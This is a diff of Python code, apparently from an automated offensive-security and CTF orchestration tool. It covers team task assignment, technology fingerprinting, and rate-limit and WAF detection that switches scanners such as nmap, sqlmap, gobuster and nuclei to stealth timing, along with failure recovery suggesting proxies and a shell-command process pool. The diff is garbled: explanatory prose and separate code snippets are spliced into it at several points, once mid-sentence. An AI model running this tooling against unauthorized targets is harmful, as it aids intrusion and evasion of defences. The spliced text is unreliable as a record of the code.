List[CTFChallenge], team_skills: Dict[str, List[str]]) -> Dict[str, Any]: """Optimize team strategy based on member skills and challenge types""" strategy = { @@ 
-4088,7 +4088,7 @@ class CTFTeamCoordinator: "estimated_total_score": 0, "time_allocation": {} } - + # Analyze team skills skill_matrix = {} for member, skills in team_skills.items(): @@ -4101,19 +4101,19 @@ class CTFTeamCoordinator: "osint": "osint" in skills or "intelligence" in skills, "misc": True # Everyone can handle misc } - + # Score challenges for each team member member_challenge_scores = {} for member in team_skills.keys(): member_challenge_scores[member] = [] - + for challenge in challenges: base_score = challenge.points skill_multiplier = 1.0 - + if skill_matrix[member].get(challenge.category, False): skill_multiplier = 1.5 # 50% bonus for skill match - + difficulty_penalty = { "easy": 1.0, "medium": 0.9, @@ -4121,19 +4121,19 @@ class CTFTeamCoordinator: "insane": 0.5, "unknown": 0.8 }[challenge.difficulty] - + final_score = base_score * skill_multiplier * difficulty_penalty - + member_challenge_scores[member].append({ "challenge": challenge, "score": final_score, "estimated_time": self._estimate_solve_time(challenge, skill_matrix[member]) }) - + # Assign challenges using Hungarian algorithm approximation assignments = self._assign_challenges_optimally(member_challenge_scores) strategy["assignments"] = assignments - + # Create priority queue all_assignments = [] for member, challenges in assignments.items(): @@ -4144,14 +4144,14 @@ class CTFTeamCoordinator: "priority": challenge_info["score"], "estimated_time": challenge_info["estimated_time"] }) - + strategy["priority_queue"] = sorted(all_assignments, key=lambda x: x["priority"], reverse=True) - + # Identify collaboration opportunities strategy["collaboration_opportunities"] = self._identify_collaboration_opportunities(challenges, team_skills) - + return strategy - + def _estimate_solve_time(self, challenge: CTFChallenge, member_skills: Dict[str, bool]) -> int: """Estimate solve time for a challenge based on member skills""" base_times = { @@ -4161,25 +4161,25 @@ class CTFTeamCoordinator: "insane": 14400, # 4 hours "unknown": 5400 # 1.5 hours } - + base_time = base_times[challenge.difficulty] - + # Skill bonus if member_skills.get(challenge.category, False): base_time = int(base_time * 0.7) # 30% faster with relevant skills - + return base_time - + def _assign_challenges_optimally(self, member_challenge_scores: Dict[str, List[Dict]]) -> Dict[str, List[Dict]]: """Assign challenges to team members optimally""" assignments = {member: [] for member in member_challenge_scores.keys()} assigned_challenges = set() - + # Simple greedy assignment (in practice, would use Hungarian algorithm) for _ in range(len(member_challenge_scores)): best_assignment = None best_score = -1 - + for member, challenge_scores in member_challenge_scores.items(): for challenge_info in challenge_scores: challenge_name = challenge_info["challenge"].name @@ -4187,18 +4187,18 @@ class CTFTeamCoordinator: if challenge_info["score"] > best_score: best_score = challenge_info["score"] best_assignment = (member, challenge_info) - + if best_assignment: member, challenge_info = best_assignment assignments[member].append(challenge_info) assigned_challenges.add(challenge_info["challenge"].name) - + return assignments - + def _identify_collaboration_opportunities(self, challenges: List[CTFChallenge], team_skills: Dict[str, List[str]]) -> List[Dict[str, Any]]: """Identify challenges that would benefit from team collaboration""" collaboration_opportunities = [] - + for challenge in challenges: if challenge.difficulty in ["hard", "insane"]: # High-difficulty challenges 
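Member scoring applies a 50% bonus when a member's skills match the challenge category, discounts by difficulty, and shaves 30% off the solve-time estimate on a skill match. The two formulas in isolation:

```python
DIFFICULTY_PENALTY = {"easy": 1.0, "medium": 0.9, "hard": 0.7,
                      "insane": 0.5, "unknown": 0.8}

def member_score(points, difficulty, has_matching_skill):
    multiplier = 1.5 if has_matching_skill else 1.0  # 50% bonus on skill match
    return points * multiplier * DIFFICULTY_PENALTY[difficulty]

def estimated_solve_time(base_seconds, has_matching_skill):
    # Relevant skills make a member ~30% faster on this category.
    return int(base_seconds * 0.7) if has_matching_skill else base_seconds

print(member_score(500, "hard", True), estimated_solve_time(7200, True))
# 525.0 5040
```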
benefit from collaboration @@ -4206,14 +4206,14 @@ class CTFTeamCoordinator: for member, skills in team_skills.items(): if challenge.category in [skill.lower() for skill in skills]: relevant_members.append(member) - + if len(relevant_members) >= 2: collaboration_opportunities.append({ "challenge": challenge.name, "recommended_team": relevant_members, "reason": f"High-difficulty {challenge.category} challenge benefits from collaboration" }) - + return collaboration_opportunities # ============================================================================ @@ -4222,7 +4222,7 @@ class CTFTeamCoordinator: class TechnologyDetector: """Advanced technology detection system for context-aware parameter selection""" - + def __init__(self): self.detection_patterns = { "web_servers": { @@ -4275,10 +4275,10 @@ class TechnologyDetector: "cdn": ["CloudFront", "Fastly", "KeyCDN", "MaxCDN", "Cloudflare"] } } - + self.port_services = { 21: "ftp", - 22: "ssh", + 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", @@ -4298,7 +4298,7 @@ class TechnologyDetector: 9200: "elasticsearch", 11211: "memcached" } - + def detect_technologies(self, target: str, headers: Dict[str, str] = None, content: str = "", ports: List[int] = None) -> Dict[str, List[str]]: """Comprehensive technology detection""" detected = { @@ -4310,7 +4310,7 @@ class TechnologyDetector: "security": [], "services": [] } - + # Header-based detection if headers: for category, tech_patterns in self.detection_patterns.items(): @@ -4320,7 +4320,7 @@ class TechnologyDetector: if pattern.lower() in header_value.lower() or pattern.lower() in header_name.lower(): if tech not in detected[category]: detected[category].append(tech) - + # Content-based detection if content: content_lower = content.lower() @@ -4330,7 +4330,7 @@ class TechnologyDetector: if pattern.lower() in content_lower: if tech not in detected[category]: detected[category].append(tech) - + # Port-based service detection if ports: for port in ports: @@ -4338,12 +4338,12 @@ class TechnologyDetector: service = self.port_services[port] if service not in detected["services"]: detected["services"].append(service) - + return detected class RateLimitDetector: """Intelligent rate limiting detection and automatic timing adjustment""" - + def __init__(self): self.rate_limit_indicators = [ "rate limit", @@ -4356,26 +4356,26 @@ class RateLimitDetector: "api limit", "request limit" ] - + self.timing_profiles = { "aggressive": {"delay": 0.1, "threads": 50, "timeout": 5}, "normal": {"delay": 0.5, "threads": 20, "timeout": 10}, "conservative": {"delay": 1.0, "threads": 10, "timeout": 15}, "stealth": {"delay": 2.0, "threads": 5, "timeout": 30} } - + def detect_rate_limiting(self, response_text: str, status_code: int, headers: Dict[str, str] = None) -> Dict[str, Any]: """Detect rate limiting from response""" rate_limit_detected = False confidence = 0.0 indicators_found = [] - + # Status code check if status_code == 429: rate_limit_detected = True confidence += 0.8 indicators_found.append("HTTP 429 status") - + # Response text check response_lower = response_text.lower() for indicator in self.rate_limit_indicators: @@ -4383,7 +4383,7 @@ class RateLimitDetector: rate_limit_detected = True confidence += 0.2 indicators_found.append(f"Text: '{indicator}'") - + # Header check if headers: rate_limit_headers = ["x-ratelimit", "retry-after", "x-rate-limit"] @@ -4393,16 +4393,16 @@ class RateLimitDetector: rate_limit_detected = True confidence += 0.3 indicators_found.append(f"Header: {header_name}") - + confidence = 
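Technology detection merges signals from response headers and open ports into one fingerprint, which later drives parameter selection. A condensed sketch with abridged pattern and port tables:

```python
PORT_SERVICES = {21: "ftp", 22: "ssh", 80: "http", 443: "https",
                 3306: "mysql", 6379: "redis", 9200: "elasticsearch"}
HEADER_HINTS = {"web_servers": {"nginx": ["nginx"], "apache": ["apache", "httpd"]}}

def detect_technologies(headers=None, ports=None):
    detected = {"web_servers": [], "services": []}
    for name, value in (headers or {}).items():
        haystack = f"{name} {value}".lower()
        for tech, patterns in HEADER_HINTS["web_servers"].items():
            if any(p in haystack for p in patterns) and tech not in detected["web_servers"]:
                detected["web_servers"].append(tech)
    for port in ports or []:
        service = PORT_SERVICES.get(port)
        if service and service not in detected["services"]:
            detected["services"].append(service)
    return detected

print(detect_technologies({"Server": "nginx/1.25"}, [22, 443, 6379]))
# {'web_servers': ['nginx'], 'services': ['ssh', 'https', 'redis']}
```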
min(1.0, confidence) - + return { "detected": rate_limit_detected, "confidence": confidence, "indicators": indicators_found, "recommended_profile": self._recommend_timing_profile(confidence) } - + def _recommend_timing_profile(self, confidence: float) -> str: """Recommend timing profile based on rate limit confidence""" if confidence >= 0.8: @@ -4413,13 +4413,13 @@ class RateLimitDetector: return "normal" else: return "aggressive" - + def adjust_timing(self, current_params: Dict[str, Any], profile: str) -> Dict[str, Any]: """Adjust timing parameters based on profile""" timing = self.timing_profiles.get(profile, self.timing_profiles["normal"]) - + adjusted_params = current_params.copy() - + # Adjust common parameters if "threads" in adjusted_params: adjusted_params["threads"] = timing["threads"] @@ -4427,28 +4427,28 @@ class RateLimitDetector: adjusted_params["delay"] = timing["delay"] if "timeout" in adjusted_params: adjusted_params["timeout"] = timing["timeout"] - + # Tool-specific adjustments if "additional_args" in adjusted_params: args = adjusted_params["additional_args"] - + # Remove existing timing arguments args = re.sub(r'-t\s+\d+', '', args) args = re.sub(r'--threads\s+\d+', '', args) args = re.sub(r'--delay\s+[\d.]+', '', args) - + # Add new timing arguments args += f" -t {timing['threads']}" if timing["delay"] > 0: args += f" --delay {timing['delay']}" - + adjusted_params["additional_args"] = args.strip() - + return adjusted_params class FailureRecoverySystem: """Intelligent failure recovery with alternative tool selection""" - + def __init__(self): self.tool_alternatives = { "nmap": ["rustscan", "masscan", "zmap"], @@ -4460,7 +4460,7 @@ class FailureRecoverySystem: "amass": ["subfinder", "sublist3r", "assetfinder"], "ffuf": ["wfuzz", "gobuster", "dirb"] } - + self.failure_patterns = { "timeout": ["timeout", "timed out", "connection timeout"], "permission_denied": ["permission denied", "access denied", "forbidden"], @@ -4469,15 +4469,15 @@ class FailureRecoverySystem: "rate_limited": ["rate limit", "too many requests", "throttled"], "authentication_required": ["authentication required", "unauthorized", "login required"] } - + def analyze_failure(self, error_output: str, exit_code: int) -> Dict[str, Any]: """Analyze failure and suggest recovery strategies""" failure_type = "unknown" confidence = 0.0 recovery_strategies = [] - + error_lower = error_output.lower() - + # Identify failure type for failure, patterns in self.failure_patterns.items(): for pattern in patterns: @@ -4485,7 +4485,7 @@ class FailureRecoverySystem: failure_type = failure confidence += 0.3 break - + # Exit code analysis if exit_code == 1: confidence += 0.1 @@ -4495,9 +4495,9 @@ class FailureRecoverySystem: elif exit_code == 126: # permission denied failure_type = "permission_denied" confidence += 0.5 - + confidence = min(1.0, confidence) - + # Generate recovery strategies if failure_type == "timeout": recovery_strategies = [ @@ -4526,14 +4526,14 @@ class FailureRecoverySystem: "Use proxy or VPN", "Verify target is accessible" ] - + return { "failure_type": failure_type, "confidence": confidence, "recovery_strategies": recovery_strategies, "alternative_tools": self.tool_alternatives.get(self._extract_tool_name(error_output), []) } - + def _extract_tool_name(self, error_output: str) -> str: """Extract tool name from error output""" for tool in self.tool_alternatives.keys(): @@ -4543,7 +4543,7 @@ class FailureRecoverySystem: class PerformanceMonitor: """Advanced performance monitoring with automatic resource 
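Rate-limit detection accumulates confidence from three sources (status code, body text, headers), caps it at 1.0, and maps the result to a timing profile. A runnable reduction using the hunk's thresholds and profiles:

```python
INDICATORS = ["rate limit", "too many requests", "slow down", "throttled"]
TIMING_PROFILES = {
    "aggressive":   {"delay": 0.1, "threads": 50},
    "normal":       {"delay": 0.5, "threads": 20},
    "conservative": {"delay": 1.0, "threads": 10},
    "stealth":      {"delay": 2.0, "threads": 5},
}

def detect_rate_limiting(body, status_code, headers=None):
    confidence, found = 0.0, []
    if status_code == 429:
        confidence += 0.8
        found.append("HTTP 429 status")
    for indicator in INDICATORS:
        if indicator in body.lower():
            confidence += 0.2
            found.append("text: " + indicator)
    for name in (headers or {}):
        if any(h in name.lower() for h in ("x-ratelimit", "retry-after")):
            confidence += 0.3
            found.append("header: " + name)
    confidence = min(1.0, confidence)
    if confidence >= 0.8:
        profile = "stealth"
    elif confidence >= 0.5:
        profile = "conservative"
    elif confidence >= 0.2:
        profile = "normal"
    else:
        profile = "aggressive"
    return {"detected": bool(found), "confidence": confidence,
            "indicators": found, "timing": TIMING_PROFILES[profile]}

print(detect_rate_limiting("Too many requests", 429, {"Retry-After": "30"}))
# confidence 1.0 -> stealth profile (delay 2.0s, 5 threads)
```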
allocation""" - + def __init__(self): self.performance_metrics = {} self.resource_thresholds = { @@ -4552,7 +4552,7 @@ class PerformanceMonitor: "disk_high": 90.0, "network_high": 80.0 } - + self.optimization_rules = { "high_cpu": { "reduce_threads": 0.5, @@ -4575,7 +4575,7 @@ class PerformanceMonitor: "enable_connection_pooling": True } } - + def monitor_system_resources(self) -> Dict[str, float]: """Monitor current system resource usage""" try: @@ -4583,7 +4583,7 @@ class PerformanceMonitor: memory = psutil.virtual_memory() disk = psutil.disk_usage('/') network = psutil.net_io_counters() - + return { "cpu_percent": cpu_percent, "memory_percent": memory.percent, @@ -4595,31 +4595,31 @@ class PerformanceMonitor: except Exception as e: logger.error(f"Error monitoring system resources: {str(e)}") return {} - + def optimize_based_on_resources(self, current_params: Dict[str, Any], resource_usage: Dict[str, float]) -> Dict[str, Any]: """Optimize parameters based on current resource usage""" optimized_params = current_params.copy() optimizations_applied = [] - + # CPU optimization if resource_usage.get("cpu_percent", 0) > self.resource_thresholds["cpu_high"]: if "threads" in optimized_params: original_threads = optimized_params["threads"] optimized_params["threads"] = max(1, int(original_threads * self.optimization_rules["high_cpu"]["reduce_threads"])) optimizations_applied.append(f"Reduced threads from {original_threads} to {optimized_params['threads']}") - + if "delay" in optimized_params: original_delay = optimized_params.get("delay", 0) optimized_params["delay"] = original_delay * self.optimization_rules["high_cpu"]["increase_delay"] optimizations_applied.append(f"Increased delay to {optimized_params['delay']}") - + # Memory optimization if resource_usage.get("memory_percent", 0) > self.resource_thresholds["memory_high"]: if "batch_size" in optimized_params: original_batch = optimized_params["batch_size"] optimized_params["batch_size"] = max(1, int(original_batch * self.optimization_rules["high_memory"]["reduce_batch_size"])) optimizations_applied.append(f"Reduced batch size from {original_batch} to {optimized_params['batch_size']}") - + # Network optimization if "network_bytes_sent" in resource_usage: # Simple heuristic for high network usage @@ -4628,19 +4628,19 @@ class PerformanceMonitor: original_conn = optimized_params["concurrent_connections"] optimized_params["concurrent_connections"] = max(1, int(original_conn * self.optimization_rules["high_network"]["reduce_concurrent_connections"])) optimizations_applied.append(f"Reduced concurrent connections to {optimized_params['concurrent_connections']}") - + optimized_params["_optimizations_applied"] = optimizations_applied return optimized_params class ParameterOptimizer: """Advanced parameter optimization system with intelligent context-aware selection""" - + def __init__(self): self.tech_detector = TechnologyDetector() self.rate_limiter = RateLimitDetector() self.failure_recovery = FailureRecoverySystem() self.performance_monitor = PerformanceMonitor() - + # Tool-specific optimization profiles self.optimization_profiles = { "nmap": { @@ -4698,15 +4698,15 @@ class ParameterOptimizer: } } } - + def optimize_parameters_advanced(self, tool: str, target_profile: TargetProfile, context: Dict[str, Any] = None) -> Dict[str, Any]: """Advanced parameter optimization with full intelligence""" if context is None: context = {} - + # Get base parameters base_params = self._get_base_parameters(tool, target_profile) - + # Detect technologies for 
context-aware optimization detected_tech = self.tech_detector.detect_technologies( target_profile.target, @@ -4714,18 +4714,18 @@ class ParameterOptimizer: content=context.get("content", ""), ports=target_profile.open_ports ) - + # Apply technology-specific optimizations tech_optimized_params = self._apply_technology_optimizations(tool, base_params, detected_tech) - + # Monitor system resources and optimize accordingly resource_usage = self.performance_monitor.monitor_system_resources() resource_optimized_params = self.performance_monitor.optimize_based_on_resources(tech_optimized_params, resource_usage) - + # Apply profile-based optimizations profile = context.get("optimization_profile", "normal") profile_optimized_params = self._apply_profile_optimizations(tool, resource_optimized_params, profile) - + # Add metadata profile_optimized_params["_optimization_metadata"] = { "detected_technologies": detected_tech, @@ -4734,13 +4734,13 @@ class ParameterOptimizer: "optimizations_applied": resource_optimized_params.get("_optimizations_applied", []), "timestamp": datetime.now().isoformat() } - + return profile_optimized_params - + def _get_base_parameters(self, tool: str, profile: TargetProfile) -> Dict[str, Any]: """Get base parameters for a tool""" base_params = {"target": profile.target} - + # Tool-specific base parameters if tool == "nmap": base_params.update({ @@ -4765,26 +4765,26 @@ class ParameterOptimizer: "severity": "critical,high,medium", "threads": 25 }) - + return base_params - + def _apply_technology_optimizations(self, tool: str, params: Dict[str, Any], detected_tech: Dict[str, List[str]]) -> Dict[str, Any]: """Apply technology-specific optimizations""" optimized_params = params.copy() - + # Web server optimizations if "apache" in detected_tech.get("web_servers", []): if tool == "gobuster": optimized_params["extensions"] = "php,html,txt,xml,conf" elif tool == "nuclei": optimized_params["tags"] = optimized_params.get("tags", "") + ",apache" - + elif "nginx" in detected_tech.get("web_servers", []): if tool == "gobuster": optimized_params["extensions"] = "php,html,txt,json,conf" elif tool == "nuclei": optimized_params["tags"] = optimized_params.get("tags", "") + ",nginx" - + # CMS optimizations if "wordpress" in detected_tech.get("cms", []): if tool == "gobuster": @@ -4794,20 +4794,20 @@ class ParameterOptimizer: optimized_params["tags"] = optimized_params.get("tags", "") + ",wordpress" elif tool == "wpscan": optimized_params["enumerate"] = "ap,at,cb,dbe" - + # Language-specific optimizations if "php" in detected_tech.get("languages", []): if tool == "gobuster": optimized_params["extensions"] = "php,php3,php4,php5,phtml,html" elif tool == "sqlmap": optimized_params["dbms"] = "mysql" - + elif "dotnet" in detected_tech.get("languages", []): if tool == "gobuster": optimized_params["extensions"] = "aspx,asp,html,txt" elif tool == "sqlmap": optimized_params["dbms"] = "mssql" - + # Security feature adaptations if detected_tech.get("security", []): # WAF detected - use stealth mode @@ -4819,34 +4819,34 @@ class ParameterOptimizer: elif tool == "sqlmap": optimized_params["delay"] = 2 optimized_params["randomize"] = True - + return optimized_params - + def _apply_profile_optimizations(self, tool: str, params: Dict[str, Any], profile: str) -> Dict[str, Any]: """Apply optimization profile settings""" if tool not in self.optimization_profiles: return params - + profile_settings = self.optimization_profiles[tool].get(profile, {}) optimized_params = params.copy() - + # Apply profile-specific 
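Technology-specific tuning then rewrites parameters per fingerprint: CMS hits swap in targeted wordlists, detected languages pick matching extensions, and any WAF/CDN hit forces stealth pacing. A small illustrative sketch (the wordlist path is hypothetical):

```python
def apply_technology_optimizations(tool, params, detected):
    tuned = dict(params)
    if "wordpress" in detected.get("cms", []) and tool == "gobuster":
        tuned["wordlist"] = "/usr/share/wordlists/wordpress.txt"  # illustrative path
    if "php" in detected.get("languages", []) and tool == "gobuster":
        tuned["extensions"] = "php,php3,php4,php5,phtml,html"
    if detected.get("security"):        # WAF/CDN present: slow down
        tuned["_stealth_mode"] = True
        tuned["delay"] = max(tuned.get("delay", 0), 2)
    return tuned

params = apply_technology_optimizations(
    "gobuster", {"threads": 30},
    {"cms": ["wordpress"], "security": ["cloudflare"]})
print(params)
```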
settings for key, value in profile_settings.items(): optimized_params[key] = value - + # Handle stealth mode flag if params.get("_stealth_mode", False) and profile != "stealth": # Force stealth settings even if different profile requested stealth_settings = self.optimization_profiles[tool].get("stealth", {}) for key, value in stealth_settings.items(): optimized_params[key] = value - + return optimized_params - + def handle_tool_failure(self, tool: str, error_output: str, exit_code: int, current_params: Dict[str, Any]) -> Dict[str, Any]: """Handle tool failure and suggest recovery""" failure_analysis = self.failure_recovery.analyze_failure(error_output, exit_code) - + recovery_plan = { "original_tool": tool, "failure_analysis": failure_analysis, @@ -4854,7 +4854,7 @@ class ParameterOptimizer: "alternative_tools": failure_analysis["alternative_tools"], "adjusted_parameters": current_params.copy() } - + # Apply automatic parameter adjustments based on failure type if failure_analysis["failure_type"] == "timeout": if "timeout" in recovery_plan["adjusted_parameters"]: @@ -4862,12 +4862,12 @@ class ParameterOptimizer: if "threads" in recovery_plan["adjusted_parameters"]: recovery_plan["adjusted_parameters"]["threads"] = max(1, recovery_plan["adjusted_parameters"]["threads"] // 2) recovery_plan["recovery_actions"].append("Increased timeout and reduced threads") - + elif failure_analysis["failure_type"] == "rate_limited": timing_profile = self.rate_limiter.adjust_timing(recovery_plan["adjusted_parameters"], "stealth") recovery_plan["adjusted_parameters"].update(timing_profile) recovery_plan["recovery_actions"].append("Applied stealth timing profile") - + return recovery_plan # ============================================================================ @@ -4876,7 +4876,7 @@ class ParameterOptimizer: class ProcessPool: """Intelligent process pool with auto-scaling capabilities""" - + def __init__(self, min_workers=2, max_workers=20, scale_threshold=0.8): self.min_workers = min_workers self.max_workers = max_workers @@ -4893,14 +4893,14 @@ class ProcessPool: "cpu_usage": 0.0, "memory_usage": 0.0 } - + # Initialize minimum workers self._scale_up(self.min_workers) - + # Start monitoring thread self.monitor_thread = threading.Thread(target=self._monitor_performance, daemon=True) self.monitor_thread.start() - + def submit_task(self, task_id: str, func, *args, **kwargs) -> str: """Submit a task to the process pool""" task = { @@ -4911,14 +4911,14 @@ class ProcessPool: "submitted_at": time.time(), "status": "queued" } - + with self.pool_lock: self.active_tasks[task_id] = task self.task_queue.put(task) - + logger.info(f"๐Ÿ“‹ Task submitted to pool: {task_id}") return task_id - + def get_task_result(self, task_id: str) -> Dict[str, Any]: """Get result of a submitted task""" with self.pool_lock: @@ -4928,32 +4928,32 @@ class ProcessPool: return {"status": self.active_tasks[task_id]["status"], "result": None} else: return {"status": "not_found", "result": None} - + def _worker_thread(self, worker_id: int): """Worker thread that processes tasks""" logger.info(f"๐Ÿ”ง Process pool worker {worker_id} started") - + while True: try: # Get task from queue with timeout task = self.task_queue.get(timeout=30) if task is None: # Shutdown signal break - + task_id = task["id"] start_time = time.time() - + # Update task status with self.pool_lock: if task_id in self.active_tasks: self.active_tasks[task_id]["status"] = "running" self.active_tasks[task_id]["worker_id"] = worker_id self.active_tasks[task_id]["started_at"] = 
start_time - + try: # Execute task result = task["func"](*task["args"], **task["kwargs"]) - + # Store result execution_time = time.time() - start_time with self.pool_lock: @@ -4964,20 +4964,20 @@ class ProcessPool: "worker_id": worker_id, "completed_at": time.time() } - + # Update performance metrics self.performance_metrics["tasks_completed"] += 1 self.performance_metrics["avg_task_time"] = ( (self.performance_metrics["avg_task_time"] * (self.performance_metrics["tasks_completed"] - 1) + execution_time) / self.performance_metrics["tasks_completed"] ) - + # Remove from active tasks if task_id in self.active_tasks: del self.active_tasks[task_id] - + logger.info(f"โœ… Task completed: {task_id} in {execution_time:.2f}s") - + except Exception as e: # Handle task failure with self.pool_lock: @@ -4988,67 +4988,67 @@ class ProcessPool: "worker_id": worker_id, "failed_at": time.time() } - + self.performance_metrics["tasks_failed"] += 1 - + if task_id in self.active_tasks: del self.active_tasks[task_id] - + logger.error(f"โŒ Task failed: {task_id} - {str(e)}") - + self.task_queue.task_done() - + except queue.Empty: # No tasks available, continue waiting continue except Exception as e: logger.error(f"๐Ÿ’ฅ Worker {worker_id} error: {str(e)}") - + def _monitor_performance(self): """Monitor pool performance and auto-scale""" while True: try: time.sleep(10) # Monitor every 10 seconds - + with self.pool_lock: queue_size = self.task_queue.qsize() active_workers = len([w for w in self.workers if w.is_alive()]) active_tasks_count = len(self.active_tasks) - + # Calculate load metrics if active_workers > 0: load_ratio = (active_tasks_count + queue_size) / active_workers else: load_ratio = float('inf') - + # Auto-scaling logic if load_ratio > self.scale_threshold and active_workers < self.max_workers: # Scale up new_workers = min(2, self.max_workers - active_workers) self._scale_up(new_workers) logger.info(f"๐Ÿ“ˆ Scaled up process pool: +{new_workers} workers (total: {active_workers + new_workers})") - + elif load_ratio < 0.3 and active_workers > self.min_workers: # Scale down workers_to_remove = min(1, active_workers - self.min_workers) self._scale_down(workers_to_remove) logger.info(f"๐Ÿ“‰ Scaled down process pool: -{workers_to_remove} workers (total: {active_workers - workers_to_remove})") - + # Update performance metrics try: cpu_percent = psutil.cpu_percent() memory_info = psutil.virtual_memory() - + with self.pool_lock: self.performance_metrics["cpu_usage"] = cpu_percent self.performance_metrics["memory_usage"] = memory_info.percent - + except Exception: pass # Ignore psutil errors - + except Exception as e: logger.error(f"๐Ÿ’ฅ Pool monitor error: {str(e)}") - + def _scale_up(self, count: int): """Add workers to the pool""" with self.pool_lock: @@ -5057,7 +5057,7 @@ class ProcessPool: worker = threading.Thread(target=self._worker_thread, args=(worker_id,), daemon=True) worker.start() self.workers.append(worker) - + def _scale_down(self, count: int): """Remove workers from the pool""" with self.pool_lock: @@ -5068,7 +5068,7 @@ class ProcessPool: # Remove from workers list (worker will exit naturally) if self.workers: self.workers.pop() - + def get_pool_stats(self) -> Dict[str, Any]: """Get current pool statistics""" with self.pool_lock: @@ -5084,7 +5084,7 @@ class ProcessPool: class AdvancedCache: """Advanced caching system with intelligent TTL and LRU eviction""" - + def __init__(self, max_size=1000, default_ttl=3600): self.max_size = max_size self.default_ttl = default_ttl @@ -5094,49 +5094,49 @@ class 
AdvancedCache: self.cache_lock = threading.RLock() self.hit_count = 0 self.miss_count = 0 - + # Start cleanup thread self.cleanup_thread = threading.Thread(target=self._cleanup_expired, daemon=True) self.cleanup_thread.start() - + def get(self, key: str) -> Any: """Get value from cache""" with self.cache_lock: current_time = time.time() - + # Check if key exists and is not expired if key in self.cache and (key not in self.ttl_times or self.ttl_times[key] > current_time): # Update access time for LRU self.access_times[key] = current_time self.hit_count += 1 return self.cache[key] - + # Cache miss or expired if key in self.cache: # Remove expired entry self._remove_key(key) - + self.miss_count += 1 return None - + def set(self, key: str, value: Any, ttl: int = None) -> None: """Set value in cache with optional TTL""" with self.cache_lock: current_time = time.time() - + # Use default TTL if not specified if ttl is None: ttl = self.default_ttl - + # Check if we need to evict entries if len(self.cache) >= self.max_size and key not in self.cache: self._evict_lru() - + # Set the value self.cache[key] = value self.access_times[key] = current_time self.ttl_times[key] = current_time + ttl - + def delete(self, key: str) -> bool: """Delete key from cache""" with self.cache_lock: @@ -5144,30 +5144,30 @@ class AdvancedCache: self._remove_key(key) return True return False - + def clear(self) -> None: """Clear all cache entries""" with self.cache_lock: self.cache.clear() self.access_times.clear() self.ttl_times.clear() - + def _remove_key(self, key: str) -> None: """Remove key and associated metadata""" self.cache.pop(key, None) self.access_times.pop(key, None) self.ttl_times.pop(key, None) - + def _evict_lru(self) -> None: """Evict least recently used entry""" if not self.access_times: return - + # Find least recently used key lru_key = min(self.access_times.keys(), key=lambda k: self.access_times[k]) self._remove_key(lru_key) logger.debug(f"๐Ÿ—‘๏ธ Evicted LRU cache entry: {lru_key}") - + def _cleanup_expired(self) -> None: """Cleanup expired entries periodically""" while True: @@ -5175,27 +5175,27 @@ class AdvancedCache: time.sleep(60) # Cleanup every minute current_time = time.time() expired_keys = [] - + with self.cache_lock: for key, expiry_time in self.ttl_times.items(): if expiry_time <= current_time: expired_keys.append(key) - + for key in expired_keys: self._remove_key(key) - + if expired_keys: logger.debug(f"๐Ÿงน Cleaned up {len(expired_keys)} expired cache entries") - + except Exception as e: logger.error(f"๐Ÿ’ฅ Cache cleanup error: {str(e)}") - + def get_stats(self) -> Dict[str, Any]: """Get cache statistics""" with self.cache_lock: total_requests = self.hit_count + self.miss_count hit_rate = (self.hit_count / total_requests * 100) if total_requests > 0 else 0 - + return { "size": len(self.cache), "max_size": self.max_size, @@ -5207,7 +5207,7 @@ class AdvancedCache: class EnhancedProcessManager: """Advanced process management with intelligent resource allocation""" - + def __init__(self): self.process_pool = ProcessPool(min_workers=4, max_workers=32) self.cache = AdvancedCache(max_size=2000, default_ttl=1800) # 30 minutes default TTL @@ -5215,11 +5215,11 @@ class EnhancedProcessManager: self.process_registry = {} self.registry_lock = threading.RLock() self.performance_dashboard = PerformanceDashboard() - + # Process termination and recovery self.termination_handlers = {} self.recovery_strategies = {} - + # Auto-scaling configuration self.auto_scaling_enabled = True self.resource_thresholds = 
{ @@ -5228,22 +5228,22 @@ class EnhancedProcessManager: "disk_high": 95.0, "load_high": 0.8 } - + # Start background monitoring self.monitor_thread = threading.Thread(target=self._monitor_system, daemon=True) self.monitor_thread.start() - + def execute_command_async(self, command: str, context: Dict[str, Any] = None) -> str: """Execute command asynchronously using process pool""" task_id = f"cmd_{int(time.time() * 1000)}_{hash(command) % 10000}" - + # Check cache first cache_key = f"cmd_result_{hash(command)}" cached_result = self.cache.get(cache_key) if cached_result and context and context.get("use_cache", True): logger.info(f"๐Ÿ“‹ Using cached result for command: {command[:50]}...") return cached_result - + # Submit to process pool self.process_pool.submit_task( task_id, @@ -5251,23 +5251,23 @@ class EnhancedProcessManager: command, context or {} ) - + return task_id - + def _execute_command_internal(self, command: str, context: Dict[str, Any]) -> Dict[str, Any]: """Internal command execution with enhanced monitoring""" start_time = time.time() - + try: # Resource-aware execution resource_usage = self.resource_monitor.get_current_usage() - + # Adjust command based on resource availability if resource_usage["cpu_percent"] > self.resource_thresholds["cpu_high"]: # Add nice priority for CPU-intensive commands if not command.startswith("nice"): command = f"nice -n 10 {command}" - + # Execute command process = subprocess.Popen( command, @@ -5277,7 +5277,7 @@ class EnhancedProcessManager: text=True, preexec_fn=os.setsid if os.name != 'nt' else None ) - + # Register process with self.registry_lock: self.process_registry[process.pid] = { @@ -5287,11 +5287,11 @@ class EnhancedProcessManager: "context": context, "status": "running" } - + # Monitor process execution stdout, stderr = process.communicate() execution_time = time.time() - start_time - + result = { "success": process.returncode == 0, "stdout": stdout, @@ -5301,18 +5301,18 @@ class EnhancedProcessManager: "pid": process.pid, "resource_usage": self.resource_monitor.get_process_usage(process.pid) } - + # Cache successful results if result["success"] and context.get("cache_result", True): cache_key = f"cmd_result_{hash(command)}" cache_ttl = context.get("cache_ttl", 1800) # 30 minutes default self.cache.set(cache_key, result, cache_ttl) - + # Update performance metrics self.performance_dashboard.record_execution(command, result) - + return result - + except Exception as e: execution_time = time.time() - start_time error_result = { @@ -5323,33 +5323,33 @@ class EnhancedProcessManager: "execution_time": execution_time, "error": str(e) } - + self.performance_dashboard.record_execution(command, error_result) return error_result - + finally: # Cleanup process registry with self.registry_lock: if hasattr(process, 'pid') and process.pid in self.process_registry: del self.process_registry[process.pid] - + def get_task_result(self, task_id: str) -> Dict[str, Any]: """Get result of async task""" return self.process_pool.get_task_result(task_id) - + def terminate_process_gracefully(self, pid: int, timeout: int = 30) -> bool: """Terminate process with graceful degradation""" try: with self.registry_lock: if pid not in self.process_registry: return False - + process_info = self.process_registry[pid] process = process_info["process"] - + # Try graceful termination first process.terminate() - + # Wait for graceful termination try: process.wait(timeout=timeout) @@ -5362,52 +5362,52 @@ class EnhancedProcessManager: process_info["status"] = 